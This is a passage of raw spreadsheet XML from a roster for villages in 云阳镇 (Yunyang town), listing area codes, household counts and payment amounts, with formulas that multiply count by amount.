        <v>4227</v>
      </c>
      <c r="F1580" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1580" s="14">
        <v>1</v>
      </c>
      <c r="H1580" s="14">
        <v>340</v>
      </c>
      <c r="I1580" s="14">
        <f t="shared" si="81"/>
        <v>340</v>
      </c>
      <c r="J1580" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1580" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1581" ht="23" customHeight="1" spans="1:11">
      <c r="A1581" s="13" t="s">
        <v>4228</v>
      </c>
      <c r="B1581" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1581" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1581" s="14" t="s">
        <v>4229</v>
      </c>
      <c r="E1581" s="14" t="s">
        <v>3913</v>
      </c>
      <c r="F1581" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1581" s="14">
        <v>1</v>
      </c>
      <c r="H1581" s="14">
        <v>340</v>
      </c>
      <c r="I1581" s="14">
        <f t="shared" si="81"/>
        <v>340</v>
      </c>
      <c r="J1581" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1581" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1582" ht="23" customHeight="1" spans="1:11">
      <c r="A1582" s="13" t="s">
        <v>4230</v>
      </c>
      <c r="B1582" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1582" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1582" s="14" t="s">
        <v>4231</v>
      </c>
      <c r="E1582" s="14" t="s">
        <v>4232</v>
      </c>
      <c r="F1582" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1582" s="14">
        <v>2</v>
      </c>
      <c r="H1582" s="14">
        <v>300</v>
      </c>
      <c r="I1582" s="14">
        <f t="shared" si="81"/>
        <v>600</v>
      </c>
      <c r="J1582" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1582" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1583" ht="23" customHeight="1" spans="1:11">
      <c r="A1583" s="13" t="s">
        <v>4233</v>
      </c>
      <c r="B1583" s="14" t="str">
        <f>B1582</f>
        <v>云阳镇</v>
      </c>
      <c r="C1583" s="14" t="str">
        <f>C1582</f>
        <v>老城一组</v>
      </c>
      <c r="D1583" s="13" t="s">
        <v>4234</v>
      </c>
      <c r="E1583" s="13" t="s">
        <v>4235</v>
      </c>
      <c r="F1583" s="14" t="str">
        <f>F1582</f>
        <v>4113210523</v>
      </c>
      <c r="G1583" s="14"/>
      <c r="H1583" s="14"/>
      <c r="I1583" s="14"/>
      <c r="J1583" s="14"/>
      <c r="K1583" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1584" ht="23" customHeight="1" spans="1:11">
      <c r="A1584" s="13" t="s">
        <v>4236</v>
      </c>
      <c r="B1584" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1584" s="14" t="s">
        <v>4237</v>
      </c>
      <c r="D1584" s="14" t="s">
        <v>4238</v>
      </c>
      <c r="E1584" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1584" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1584" s="14">
        <v>3</v>
      </c>
      <c r="H1584" s="14">
        <v>295</v>
      </c>
      <c r="I1584" s="14">
        <f>H1584*G1584</f>
        <v>885</v>
      </c>
      <c r="J1584" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1584" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1585" ht="23" customHeight="1" spans="1:11">
      <c r="A1585" s="13" t="s">
        <v>4239</v>
      </c>
      <c r="B1585" s="14" t="str">
        <f>B1584</f>
        <v>云阳镇</v>
      </c>
      <c r="C1585" s="14" t="str">
        <f>C1584</f>
        <v>云阳老城一组</v>
      </c>
      <c r="D1585" s="13" t="s">
        <v>4240</v>
      </c>
      <c r="E1585" s="13" t="s">
        <v>3616</v>
      </c>
      <c r="F1585" s="14" t="str">
        <f>F1584</f>
        <v>4113210523</v>
      </c>
      <c r="G1585" s="14"/>
      <c r="H1585" s="14"/>
      <c r="I1585" s="14"/>
      <c r="J1585" s="14"/>
      <c r="K1585" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1586" ht="23" customHeight="1" spans="1:11">
      <c r="A1586" s="13" t="s">
        <v>4241</v>
      </c>
      <c r="B1586" s="14" t="str">
        <f>B1585</f>
        <v>云阳镇</v>
      </c>
      <c r="C1586" s="14" t="str">
        <f>C1585</f>
        <v>云阳老城一组</v>
      </c>
      <c r="D1586" s="13" t="s">
        <v>4242</v>
      </c>
      <c r="E1586" s="18" t="s">
        <v>4243</v>
      </c>
      <c r="F1586" s="14" t="str">
        <f>F1585</f>
        <v>4113210523</v>
      </c>
      <c r="G1586" s="14"/>
      <c r="H1586" s="14"/>
      <c r="I1586" s="14"/>
      <c r="J1586" s="14"/>
      <c r="K1586" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1587" ht="23" customHeight="1" spans="1:11">
      <c r="A1587" s="13" t="s">
        <v>4244</v>
      </c>
      <c r="B1587" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1587" s="14" t="s">
        <v>4245</v>
      </c>
      <c r="D1587" s="14" t="s">
        <v>4246</v>
      </c>
      <c r="E1587" s="14" t="s">
        <v>4077</v>
      </c>
      <c r="F1587" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1587" s="14">
        <v>1</v>
      </c>
      <c r="H1587" s="14">
        <v>340</v>
      </c>
      <c r="I1587" s="14">
        <f t="shared" ref="I1587:I1601" si="82">H1587*G1587</f>
        <v>340</v>
      </c>
      <c r="J1587" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1587" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1588" ht="23" customHeight="1" spans="1:11">
      <c r="A1588" s="13" t="s">
        <v>4247</v>
      </c>
      <c r="B1588" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1588" s="14" t="s">
        <v>4248</v>
      </c>
      <c r="D1588" s="14" t="s">
        <v>4249</v>
      </c>
      <c r="E1588" s="14" t="s">
        <v>4250</v>
      </c>
      <c r="F1588" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1588" s="14">
        <v>1</v>
      </c>
      <c r="H1588" s="14">
        <v>340</v>
      </c>
      <c r="I1588" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1588" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1588" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1589" ht="23" customHeight="1" spans="1:11">
      <c r="A1589" s="13" t="s">
        <v>4251</v>
      </c>
      <c r="B1589" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1589" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1589" s="14" t="s">
        <v>4252</v>
      </c>
      <c r="E1589" s="14" t="s">
        <v>4250</v>
      </c>
      <c r="F1589" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1589" s="14">
        <v>1</v>
      </c>
      <c r="H1589" s="14">
        <v>340</v>
      </c>
      <c r="I1589" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1589" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1589" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1590" ht="23" customHeight="1" spans="1:11">
      <c r="A1590" s="13" t="s">
        <v>4253</v>
      </c>
      <c r="B1590" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1590" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1590" s="14" t="s">
        <v>4254</v>
      </c>
      <c r="E1590" s="14" t="s">
        <v>4136</v>
      </c>
      <c r="F1590" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1590" s="14">
        <v>1</v>
      </c>
      <c r="H1590" s="14">
        <v>340</v>
      </c>
      <c r="I1590" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1590" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1590" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1591" ht="23" customHeight="1" spans="1:11">
      <c r="A1591" s="13" t="s">
        <v>4255</v>
      </c>
      <c r="B1591" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1591" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1591" s="14" t="s">
        <v>4256</v>
      </c>
      <c r="E1591" s="14" t="s">
        <v>4257</v>
      </c>
      <c r="F1591" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1591" s="14">
        <v>1</v>
      </c>
      <c r="H1591" s="14">
        <v>340</v>
      </c>
      <c r="I1591" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1591" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1591" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1592" ht="23" customHeight="1" spans="1:11">
      <c r="A1592" s="13" t="s">
        <v>4258</v>
      </c>
      <c r="B1592" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1592" s="14" t="s">
        <v>4143</v>
      </c>
      <c r="D1592" s="14" t="s">
        <v>4259</v>
      </c>
      <c r="E1592" s="14" t="s">
        <v>4260</v>
      </c>
      <c r="F1592" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1592" s="14">
        <v>1</v>
      </c>
      <c r="H1592" s="14">
        <v>340</v>
      </c>
      <c r="I1592" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1592" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1592" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1593" ht="23" customHeight="1" spans="1:11">
      <c r="A1593" s="13" t="s">
        <v>4261</v>
      </c>
      <c r="B1593" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1593" s="14" t="s">
        <v>4143</v>
      </c>
      <c r="D1593" s="14" t="s">
        <v>4262</v>
      </c>
      <c r="E1593" s="14" t="s">
        <v>3863</v>
      </c>
      <c r="F1593" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1593" s="14">
        <v>1</v>
      </c>
      <c r="H1593" s="14">
        <v>340</v>
      </c>
      <c r="I1593" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1593" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1593" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1594" ht="23" customHeight="1" spans="1:11">
      <c r="A1594" s="13" t="s">
        <v>4263</v>
      </c>
      <c r="B1594" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1594" s="14" t="s">
        <v>4143</v>
      </c>
      <c r="D1594" s="14" t="s">
        <v>4264</v>
      </c>
      <c r="E1594" s="14" t="s">
        <v>1107</v>
      </c>
      <c r="F1594" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1594" s="14">
        <v>1</v>
      </c>
      <c r="H1594" s="14">
        <v>340</v>
      </c>
      <c r="I1594" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1594" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1594" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1595" ht="23" customHeight="1" spans="1:11">
      <c r="A1595" s="13" t="s">
        <v>4265</v>
      </c>
      <c r="B1595" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1595" s="14" t="s">
        <v>4138</v>
      </c>
      <c r="D1595" s="14" t="s">
        <v>4266</v>
      </c>
      <c r="E1595" s="14" t="s">
        <v>4267</v>
      </c>
      <c r="F1595" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1595" s="14">
        <v>1</v>
      </c>
      <c r="H1595" s="14">
        <v>340</v>
      </c>
      <c r="I1595" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1595" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1595" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1596" ht="23" customHeight="1" spans="1:11">
      <c r="A1596" s="13" t="s">
        <v>4268</v>
      </c>
      <c r="B1596" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1596" s="14" t="s">
        <v>3670</v>
      </c>
      <c r="D1596" s="14" t="s">
        <v>4269</v>
      </c>
      <c r="E1596" s="14" t="s">
        <v>3975</v>
      </c>
      <c r="F1596" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1596" s="14">
        <v>1</v>
      </c>
      <c r="H1596" s="14">
        <v>340</v>
      </c>
      <c r="I1596" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1596" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1596" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1597" ht="23" customHeight="1" spans="1:11">
      <c r="A1597" s="13" t="s">
        <v>4270</v>
      </c>
      <c r="B1597" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1597" s="14" t="s">
        <v>4248</v>
      </c>
      <c r="D1597" s="14" t="s">
        <v>4271</v>
      </c>
      <c r="E1597" s="14" t="s">
        <v>4272</v>
      </c>
      <c r="F1597" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1597" s="14">
        <v>1</v>
      </c>
      <c r="H1597" s="14">
        <v>340</v>
      </c>
      <c r="I1597" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1597" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1597" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1598" ht="23" customHeight="1" spans="1:11">
      <c r="A1598" s="13" t="s">
        <v>4273</v>
      </c>
      <c r="B1598" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1598" s="14" t="s">
        <v>4248</v>
      </c>
      <c r="D1598" s="14" t="s">
        <v>4274</v>
      </c>
      <c r="E1598" s="14" t="s">
        <v>4275</v>
      </c>
      <c r="F1598" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1598" s="14">
        <v>1</v>
      </c>
      <c r="H1598" s="14">
        <v>340</v>
      </c>
      <c r="I1598" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1598" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1598" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1599" ht="23" customHeight="1" spans="1:11">
      <c r="A1599" s="13" t="s">
        <v>4276</v>
      </c>
      <c r="B1599" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1599" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1599" s="14" t="s">
        <v>4277</v>
      </c>
      <c r="E1599" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1599" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1599" s="14">
        <v>1</v>
      </c>
      <c r="H1599" s="14">
        <v>340</v>
      </c>
      <c r="I1599" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1599" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1599" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1600" ht="23" customHeight="1" spans="1:11">
      <c r="A1600" s="13" t="s">
        <v>4278</v>
      </c>
      <c r="B1600" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1600" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1600" s="14" t="s">
        <v>4279</v>
      </c>
      <c r="E1600" s="14" t="s">
        <v>4280</v>
      </c>
      <c r="F1600" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1600" s="14">
        <v>1</v>
      </c>
      <c r="H1600" s="14">
        <v>340</v>
      </c>
      <c r="I1600" s="14">
        <f t="shared" si="82"/>
        <v>340</v>
      </c>
      <c r="J1600" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1600" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1601" ht="23" customHeight="1" spans="1:11">
      <c r="A1601" s="13" t="s">
        <v>4281</v>
      </c>
      <c r="B1601" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1601" s="14" t="s">
        <v>4131</v>
      </c>
      <c r="D1601" s="14" t="s">
        <v>4282</v>
      </c>
      <c r="E1601" s="14" t="s">
        <v>4283</v>
      </c>
      <c r="F1601" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1601" s="14">
        <v>2</v>
      </c>
      <c r="H1601" s="14">
        <v>300</v>
      </c>
      <c r="I1601" s="14">
        <f t="shared" si="82"/>
        <v>600</v>
      </c>
      <c r="J1601" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1601" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1602" ht="23" customHeight="1" spans="1:11">
      <c r="A1602" s="13" t="s">
        <v>4284</v>
      </c>
      <c r="B1602" s="14" t="str">
        <f>B1601</f>
        <v>云阳镇</v>
      </c>
      <c r="C1602" s="14" t="str">
        <f>C1601</f>
        <v>云阳小关</v>
      </c>
      <c r="D1602" s="13" t="s">
        <v>4285</v>
      </c>
      <c r="E1602" s="13" t="s">
        <v>2560</v>
      </c>
      <c r="F1602" s="14" t="str">
        <f>F1601</f>
        <v>4113210521</v>
      </c>
      <c r="G1602" s="14"/>
      <c r="H1602" s="14"/>
      <c r="I1602" s="14"/>
      <c r="J1602" s="14"/>
      <c r="K1602" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1603" ht="23" customHeight="1" spans="1:11">
      <c r="A1603" s="13" t="s">
        <v>4286</v>
      </c>
      <c r="B1603" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1603" s="14" t="s">
        <v>4287</v>
      </c>
      <c r="D1603" s="14" t="s">
        <v>4288</v>
      </c>
      <c r="E1603" s="14" t="s">
        <v>3991</v>
      </c>
      <c r="F1603" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1603" s="14">
        <v>1</v>
      </c>
      <c r="H1603" s="14">
        <v>340</v>
      </c>
      <c r="I1603" s="14">
        <f t="shared" ref="I1603:I1616" si="83">H1603*G1603</f>
        <v>340</v>
      </c>
      <c r="J1603" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1603" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1604" ht="23" customHeight="1" spans="1:11">
      <c r="A1604" s="13" t="s">
        <v>4289</v>
      </c>
      <c r="B1604" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1604" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="D1604" s="14" t="s">
        <v>4290</v>
      </c>
      <c r="E1604" s="14" t="s">
        <v>3879</v>
      </c>
      <c r="F1604" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1604" s="14">
        <v>1</v>
      </c>
      <c r="H1604" s="14">
        <v>340</v>
      </c>
      <c r="I1604" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1604" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1604" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1605" ht="23" customHeight="1" spans="1:11">
      <c r="A1605" s="13" t="s">
        <v>4291</v>
      </c>
      <c r="B1605" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1605" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="D1605" s="14" t="s">
        <v>4292</v>
      </c>
      <c r="E1605" s="14" t="s">
        <v>4111</v>
      </c>
      <c r="F1605" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1605" s="14">
        <v>1</v>
      </c>
      <c r="H1605" s="14">
        <v>340</v>
      </c>
      <c r="I1605" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1605" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1605" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1606" ht="23" customHeight="1" spans="1:11">
      <c r="A1606" s="13" t="s">
        <v>4293</v>
      </c>
      <c r="B1606" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1606" s="14" t="s">
        <v>4134</v>
      </c>
      <c r="D1606" s="14" t="s">
        <v>4294</v>
      </c>
      <c r="E1606" s="14" t="s">
        <v>4006</v>
      </c>
      <c r="F1606" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1606" s="14">
        <v>1</v>
      </c>
      <c r="H1606" s="14">
        <v>340</v>
      </c>
      <c r="I1606" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1606" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1606" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1607" ht="23" customHeight="1" spans="1:11">
      <c r="A1607" s="13" t="s">
        <v>4295</v>
      </c>
      <c r="B1607" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1607" s="14" t="s">
        <v>3954</v>
      </c>
      <c r="D1607" s="14" t="s">
        <v>4296</v>
      </c>
      <c r="E1607" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1607" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1607" s="14">
        <v>1</v>
      </c>
      <c r="H1607" s="14">
        <v>340</v>
      </c>
      <c r="I1607" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1607" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1607" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1608" ht="23" customHeight="1" spans="1:11">
      <c r="A1608" s="13" t="s">
        <v>4297</v>
      </c>
      <c r="B1608" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1608" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1608" s="14" t="s">
        <v>4299</v>
      </c>
      <c r="E1608" s="14" t="s">
        <v>4300</v>
      </c>
      <c r="F1608" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1608" s="14">
        <v>1</v>
      </c>
      <c r="H1608" s="14">
        <v>340</v>
      </c>
      <c r="I1608" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1608" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1608" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1609" ht="23" customHeight="1" spans="1:11">
      <c r="A1609" s="13" t="s">
        <v>4301</v>
      </c>
      <c r="B1609" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1609" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1609" s="14" t="s">
        <v>4302</v>
      </c>
      <c r="E1609" s="14" t="s">
        <v>3752</v>
      </c>
      <c r="F1609" s="14" t="s">
        <v>4303</v>
      </c>
      <c r="G1609" s="14">
        <v>1</v>
      </c>
      <c r="H1609" s="14">
        <v>335</v>
      </c>
      <c r="I1609" s="14">
        <f t="shared" si="83"/>
        <v>335</v>
      </c>
      <c r="J1609" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1609" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1610" ht="23" customHeight="1" spans="1:11">
      <c r="A1610" s="13" t="s">
        <v>4304</v>
      </c>
      <c r="B1610" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1610" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1610" s="14" t="s">
        <v>4305</v>
      </c>
      <c r="E1610" s="14" t="s">
        <v>3760</v>
      </c>
      <c r="F1610" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1610" s="14">
        <v>1</v>
      </c>
      <c r="H1610" s="14">
        <v>340</v>
      </c>
      <c r="I1610" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1610" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1610" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1611" ht="23" customHeight="1" spans="1:11">
      <c r="A1611" s="13" t="s">
        <v>4306</v>
      </c>
      <c r="B1611" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1611" s="14" t="s">
        <v>4307</v>
      </c>
      <c r="D1611" s="14" t="s">
        <v>4308</v>
      </c>
      <c r="E1611" s="14" t="s">
        <v>4309</v>
      </c>
      <c r="F1611" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1611" s="14">
        <v>1</v>
      </c>
      <c r="H1611" s="14">
        <v>340</v>
      </c>
      <c r="I1611" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1611" s="14">
        <v>45017</v>
      </c>
      <c r="K1611" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1612" ht="23" customHeight="1" spans="1:11">
      <c r="A1612" s="13" t="s">
        <v>4310</v>
      </c>
      <c r="B1612" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1612" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1612" s="14" t="s">
        <v>4311</v>
      </c>
      <c r="E1612" s="14" t="s">
        <v>4077</v>
      </c>
      <c r="F1612" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1612" s="14">
        <v>1</v>
      </c>
      <c r="H1612" s="14">
        <v>340</v>
      </c>
      <c r="I1612" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1612" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1612" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1613" ht="23" customHeight="1" spans="1:11">
      <c r="A1613" s="13" t="s">
        <v>4312</v>
      </c>
      <c r="B1613" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1613" s="14" t="s">
        <v>4313</v>
      </c>
      <c r="D1613" s="14" t="s">
        <v>4314</v>
      </c>
      <c r="E1613" s="14" t="s">
        <v>3733</v>
      </c>
      <c r="F1613" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1613" s="14">
        <v>1</v>
      </c>
      <c r="H1613" s="14">
        <v>340</v>
      </c>
      <c r="I1613" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1613" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1613" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1614" ht="23" customHeight="1" spans="1:11">
      <c r="A1614" s="13" t="s">
        <v>4315</v>
      </c>
      <c r="B1614" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1614" s="14" t="s">
        <v>4316</v>
      </c>
      <c r="D1614" s="14" t="s">
        <v>4317</v>
      </c>
      <c r="E1614" s="14" t="s">
        <v>4318</v>
      </c>
      <c r="F1614" s="14" t="s">
        <v>4319</v>
      </c>
      <c r="G1614" s="14">
        <v>1</v>
      </c>
      <c r="H1614" s="14">
        <v>340</v>
      </c>
      <c r="I1614" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1614" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1614" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1615" ht="23" customHeight="1" spans="1:11">
      <c r="A1615" s="13" t="s">
        <v>4321</v>
      </c>
      <c r="B1615" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1615" s="14" t="s">
        <v>4316</v>
      </c>
      <c r="D1615" s="14" t="s">
        <v>4322</v>
      </c>
      <c r="E1615" s="14" t="s">
        <v>3713</v>
      </c>
      <c r="F1615" s="14" t="s">
        <v>4319</v>
      </c>
      <c r="G1615" s="14">
        <v>1</v>
      </c>
      <c r="H1615" s="14">
        <v>340</v>
      </c>
      <c r="I1615" s="14">
        <f t="shared" si="83"/>
        <v>340</v>
      </c>
      <c r="J1615" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1615" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1616" ht="23" customHeight="1" spans="1:11">
      <c r="A1616" s="13" t="s">
        <v>4323</v>
      </c>
      <c r="B1616" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1616" s="14" t="s">
        <v>4316</v>
      </c>
      <c r="D1616" s="14" t="s">
        <v>4324</v>
      </c>
      <c r="E1616" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F1616" s="14" t="s">
        <v>4319</v>
      </c>
      <c r="G1616" s="14">
        <v>2</v>
      </c>
      <c r="H1616" s="14">
        <v>300</v>
      </c>
      <c r="I1616" s="14">
        <f t="shared" si="83"/>
        <v>600</v>
      </c>
      <c r="J1616" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1616" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1617" ht="23" customHeight="1" spans="1:11">
      <c r="A1617" s="13" t="s">
        <v>4325</v>
      </c>
      <c r="B1617" s="14" t="str">
        <f>B1616</f>
        <v>云阳镇</v>
      </c>
      <c r="C1617" s="14" t="str">
        <f>C1616</f>
        <v>西关居委会</v>
      </c>
      <c r="D1617" s="13" t="s">
        <v>4326</v>
      </c>
      <c r="E1617" s="13" t="s">
        <v>4327</v>
      </c>
      <c r="F1617" s="14" t="str">
        <f>F1616</f>
        <v>4113210524</v>
      </c>
      <c r="G1617" s="14"/>
      <c r="H1617" s="14"/>
      <c r="I1617" s="14"/>
      <c r="J1617" s="14"/>
      <c r="K1617" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1618" ht="23" customHeight="1" spans="1:11">
      <c r="A1618" s="13" t="s">
        <v>4328</v>
      </c>
      <c r="B1618" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1618" s="14" t="s">
        <v>4329</v>
      </c>
      <c r="D1618" s="14" t="s">
        <v>4330</v>
      </c>
      <c r="E1618" s="14" t="s">
        <v>3609</v>
      </c>
      <c r="F1618" s="14" t="s">
        <v>4331</v>
      </c>
      <c r="G1618" s="14">
        <v>1</v>
      </c>
      <c r="H1618" s="14">
        <v>340</v>
      </c>
